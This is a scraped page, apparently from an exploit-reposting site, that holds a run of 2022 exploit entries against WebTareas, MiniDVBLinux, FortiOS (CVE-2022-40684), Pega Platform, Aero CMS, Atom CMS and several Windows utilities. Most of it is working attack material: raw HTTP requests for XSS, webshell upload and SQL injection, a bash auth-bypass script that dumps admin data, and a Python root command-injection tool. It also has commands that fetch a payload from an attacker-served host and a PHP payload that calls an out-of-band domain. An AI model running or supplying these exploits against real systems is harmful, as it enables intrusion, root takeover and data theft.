/webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 07:46:31 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11147 [...] <form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)"> [...] ----------------------------------------------------------------------------------------------------------------------- Other vulnerable url and params: ----------------------------------------------------------------------------------------------------------------------- /webtareas/administration/print_layout.php [doc_type] /webtareas/general/login.php [logout] /webtareas/general/login.php [session] /webtareas/general/newnotifications.php [msg] /webtareas/general/search.php [searchtype] /webtareas/administration/print_layout.php [doc_type]
HireHackking

WebTareas 2.4 - RCE (Authorized)

HACKER · %s · %s

# Exploit Title: WebTareas 2.4 - RCE (Authorized) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example in forum -> members forum -> chat ----------------------------------------------------------------------------------------------------------------------- Param: chatPhotos0 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /webtareas/includes/chattab_serv.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126 Content-Length: 6852 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="action" sendPhotos -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatTo" 2 -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatType" P -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php" Content-Type: image/png PNG [...] <?php phpinfo();?> [...] ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 11:27:41 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 661 Connection: close Content-Type: application/json {"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"} ----------------------------------------------------------------------------------------------------------------------- See link: /files\/Messages\/7.php ----------------------------------------------------------------------------------------------------------------------- Req: ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/files/Messages/7.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,*/* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 11:28:16 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89945 [...] <title>PHP 7.4.30 - phpinfo()</title> [...] <h1 class="p">PHP Version 7.4.30</h1> </td></tr> </table> <table> <tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr> <tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr> <tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]
HireHackking

MiniDVBLinux 5.4 - Change Root Password

HACKER · %s · %s

# Exploit Title: MiniDVBLinux 5.4 - Change Root Password # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Change Root Password PoC Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows a remote attacker to change the root password of the system without authentication (disabled by default) and verification of previously assigned credential. Command execution also possible using several POST parameters. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5715 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php 24.09.2022 -- Default root password: mld500 Change system password: ----------------------- POST /?site=setup&section=System HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 778 Content-Type: application/x-www-form-urlencoded Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba Host: ip:8008 Origin: http://ip:8008 Referer: http://ip:8008/?site=setup&section=System Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 sec-gpc: 1 APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+ Pretty post data: APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: r00t BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Kumanovo KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: SYSTEM_PASSWORD Eenable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 WEBIF_PASSWORD_CHECK: 1 action: save params: changed: WEBIF_PASSWORD_CHECK Disable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: WEBIF_PASSWORD_CHECK
HireHackking
# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager) # Date: 13/10/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.fortinet.com/ # Version: #FortiOS from 7.2.0 to 7.2.1 #FortiOS from 7.0.0 to 7.0.6 #FortiProxy 7.2.0 #FortiProxy from 7.0.0 to 7.0.6 #FortiSwitchManager 7.2.0 #FortiSwitchManager 7.0.0 # Tested on: Kali Linux # CVE : CVE-2022-40684 # https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass # Usage: ./poc.sh <ip> <port> # Example: ./poc.sh 10.10.10.120 8443 #!/bin/bash red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" yellow="\e[0;33m\033[1m" end="\033[0m\e[0m" target=$1 port=$2 vuln () { echo -e "${yellow}[+] Dumping System Information: ${end}" timeout 10 curl -s -k -X $'GET' \ -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out if [ "$?" == "0" ];then grep "results" ./$target.out >/dev/null if [ "$?" == "0" ];then echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}" else rm -f ./$target.out echo -e "${red}Not Vulnerable ${end}" fi else echo -e "${red}Not Vulnerable ${end}" rm -f ./$target.out fi } vuln
HireHackking
# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application suffers from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). -------------------------------------------------------------------- /var/www/tpl/tv_action.sh: -------------------------- 01: #!/bin/sh 02: 03: header 04: 05: quality=60 06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" 07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null -------------------------------------------------------------------- Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5716 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php 24.09.2022 -- 1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 250 Grabbed image /tmp/tv.jpg 60 221 mld closing connection 2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg 3. Or use a browser: - http://ip:8008/home?site=remotecontrol
HireHackking
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 20 Oct 2022 # Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit) # Vendor Homepage: www.pega.com # Software Link: Not Available # Version: 8.1.0 on-premise and higher, up to 8.3.7 # Tested on: Red Hat Enterprise 7 # CVE : CVE-2022-24082 ;Dumping RMI registry: nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address> ;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1 :<PORT>) ;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well): nmap -sT -sV -p <PORT> <IP Address> ;Exploitation requires: ;- JVM ;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet) ;- jython ;Installing mbean for remote code execution java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666 ;Execution of commands id & ifconfig java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig" ;More details: https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316 Kind Regards, Marcin Wolak
HireHackking
# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The application suffers from an OS command injection vulnerability. # This can be exploited to execute arbitrary commands with root privileges. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5717 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT #test case 004 #http://ip:8008/?site=about&name=blind&file=$(id) #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory #test case 005 #http://ip:8008/?site=about&name=blind&file=`id` #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Injection PoC') print('Usage: ./mldhd_root2.py [url] [cmd]') sys.exit(17) else: url = sys.argv[1] cmd = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))
HireHackking

Resource Hacker v3.6.0.92 - Buffer overflow

HACKER · %s · %s

# Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-06 # Vendor Homepage: http://www.angusj.com/resourcehacker/ # Software Link : http://www.angusj.com/resourcehacker/ # Tested Version: 3.6.0.92 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Heap-based buffer overflow controlling the Structured Exception Handler (SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open ResHacker.exe from command line with a large string in Arguments, more than 268 chars: File 'C:\ResourceHacker36\ResHacker.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...' SEH chain of main thread Address SE handler 0018FCB4 316A4130 6A413969 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fcb4 overwritten with normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic data after the handler 0BADF00D ------------------------------ 'Targets' => [ [ '<fill in the OS/app version here>', { 'Ret' => 0x00426446, # pop eax # pop ebx # ret - ResHacker.exe (change this value from Mona, with a not \x00 ret address) 'Offset' => 268 } ], ],
HireHackking

Scdbg 1.0 - Buffer overflow DoS

HACKER · %s · %s

# Exploit Title: Scdbg 1.0 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2021-06-13 # Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152 # Software Link : https://github.com/dzzie/VS_LIBEMU # Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45 # Tested on: Windows 7, 10 CVSS v3: 7.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CWE: CWE-400 Vulnerability description: scdbg.exe (all versions) is affected by a Denial of Service vulnerability that occurs when you use the /foff parameter or not with a specific shellcode causing it to shutdown. Any malware could use this option to evade the scan. Proof of concept: Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin #!/usr/bin/env python crash = "\x90\xF6\x84\x01\x90\x90\x90\x90" f = open ("scdbg_crash.bin", "w") f.write(crash) f.close() You can use gui_launcher.exe and check "Start offset 0x": 1 or directly without check [image: image.png]
HireHackking

Hex Workshop v6.7 - Buffer overflow DoS

HACKER · %s · %s

# Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-06 # Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com # Software Link : http://www.bpsoft.com, http://www.hexworkshop.com # Tested Version: v6.7 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Hex Workshop v6.7 is vulnerable to denial of service via a command line file arguments and control the Structured Exception Handler (SEH) records. Proof of concept: Open HWorks32.exe from command line with a large string in Arguments, more than 268 chars: File 'C:\Hex Workshop\HWorks32.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..." 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic data after the handler The application crash.
HireHackking

Aero CMS v0.0.1 - PHP Code Injection (auth)

HACKER · %s · %s

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: image content uploading image ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116 Content-Length: 1156 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_title" mmmmmmmmmmmmmmmmm -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_category_id" 1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_user" admin -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_status" draft -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="image"; filename="at8vapghhb.php" Content-Type: text/plain <?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_tags" -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_content" <p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="create_post" Publish Post -----------------------------369779619541997471051134453116-- ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.
HireHackking

Atom CMS v2.0 - SQL Injection (no auth)

HACKER · %s · %s

# Exploit Title: Atom CMS v2.0 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: id ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 93 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1 Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1 --------------------------------------------------------------------------------------------------------------------- -- Response wait 10 sec ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /Atom.CMS-master/admin/index.php [email] /Atom.CMS-master/admin/index.php [id] /Atom.CMS-master/admin/index.php [slug] /Atom.CMS-master/admin/index.php [status] /Atom.CMS-master/admin/index.php [user]
HireHackking

AVS Audio Converter 10.3 - Stack Overflow (SEH)

HACKER · %s · %s

